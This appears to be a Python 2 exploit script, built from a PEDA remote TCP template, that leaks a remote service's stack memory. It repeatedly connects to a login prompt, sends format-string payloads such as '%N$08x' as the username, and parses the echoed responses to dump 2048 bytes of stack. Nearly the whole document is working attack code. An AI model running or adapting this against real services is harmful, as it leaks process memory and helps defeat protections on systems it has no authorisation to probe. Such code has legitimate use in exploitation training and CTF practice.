#!/usr/bin/env python## Template for remote TCP exploit code, generated by P

1. #!/usr/bin/env python
2. #
3. # Template for remote TCP exploit code, generated by PEDA
4. #
5. import os
6. import sys
7. import struct
8. import resource
9. import time
10. import re
11.  
12. def usage():
13.     print "Usage: %s host port" % sys.argv[0]
14.     return
15.  
16. from socket import *
17. import telnetlib
18. class TCPClient():
19.     def __init__(self, host, port, debug=0):
20.         self.debug = debug
21.         self.sock = socket(AF_INET, SOCK_STREAM)
22.         self.sock.connect((host, port))
23.  
24.     def debug_log(self, size, data, cmd):
25.         if self.debug != 0:
26.             print "%s(%d): %s" % (cmd, size, repr(data))
27.  
28.     def send(self, data, delay=0):
29.         if delay:
30.             time.sleep(delay)
31.         nsend = self.sock.send(data)
32.         if self.debug > 1:
33.             self.debug_log(nsend, data, "send")
34.         return nsend
35.  
36.     def sendline(self, data, delay=0):
37.         nsend = self.send(data + "\n", delay)
38.         return nsend
39.  
40.     def recv(self, size=1024, delay=0):
41.         if delay:
42.             time.sleep(delay)
43.         buf = self.sock.recv(size)
44.         if self.debug > 0:
45.             self.debug_log(len(buf), buf, "recv")
46.         return buf
47.  
48.     def recv_until(self, delim):
49.         buf = ""
50.         while True:
51.             c = self.sock.recv(1)
52.             buf += c
53.             if delim in buf:
54.                 break
55.         self.debug_log(len(buf), buf, "recv")
56.         return buf
57.  
58.     def recvline(self):
59.         buf = self.recv_until("\n")
60.         return buf
61.  
62.     def close(self):
63.         self.sock.close()
64.  
65.  
66. def exploit(host, port):
67.     index = 0
68.     done = False
69.     stack = [] 
70.     try:
71.         # connect
72.         port = int(port)
73.         client = TCPClient(host, port, debug=0)
74.        
75.         print '[+] Stack dumper started'   
76.         # 512 eq. 2048(512 * 4) bytes from stack
77.         while index != 512:
78.             # recieve username banner and send a crafted formatstring response
79.             client.recv(1024)
80.  
81.             index += 1
82.             fsr = "%{0}$08x".format(str(index))
83.             client.send(fsr + '\n')
84.  
85.             # recieve password banner and send a empty response
86.             client.recv(1024)
87.             client.send('\n')
88.            
89.             # recieve email banner and send a empty response
90.             client.recv(1024)
91.             client.send('\n')
92.            
93.             # recieve the result message and extract the formatstring response
94.             # from the username entry
95.             l = re.findall(r"'(.*?)'", client.recv(1024))
96.            
97.             stack.append( l[0] )
98.            
99.             # recieve the retry message and response
100.             client.recv(1024)
101.             client.send('yes\n')
102.        
103.         # some insurence
104.         client.close()
105.        
106.         for i in range(len(stack) / 4):
107.             print '%08d:'%((i * 4)+1), stack[(i*4)], stack[(i*4)+1], stack[(i*4)+2],stack[(i*4)+3]
108.  
109.         print '[-] Stack dumper finished'
110.    
111.     except Exception:
112.         # some insurence
113.         client.close()
114.         exit()
115.  
116. if __name__ == "__main__":
117.     if len(sys.argv) < 3:
118.         usage()
119.     else:
120.         exploit(sys.argv[1], sys.argv[2])